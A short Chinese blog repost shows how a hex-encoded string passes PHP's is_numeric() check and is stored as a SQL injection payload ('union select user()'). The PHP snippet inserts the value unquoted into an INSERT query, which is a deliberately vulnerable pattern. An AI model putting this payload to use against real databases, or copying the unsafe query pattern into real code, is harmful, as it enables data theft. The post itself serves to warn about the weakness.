PHP之intval()
浏览数:16 /
时间:2015年06月09日
Title:PHP之intval() --2014-02-26 13:57
<?php
......
$a=‘0x2720616e6420313d3220756e696f6e2073656c656374207573657228292c322c332d2d2b‘;
//$a=$_REQUEST[‘a‘];
if(is_numeric($a))
{
intval($a); //转也无用
$query_str="insert into tsa (strA) Values ($a)";
$con->query($query_str);
}
mysqli_close($con);
?>
入库后:
‘ and 1=2 union select user(),2,3--+
如图:
FROM:
http://worm.cc/Is_php_funciton_is_numberic_safe.html
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
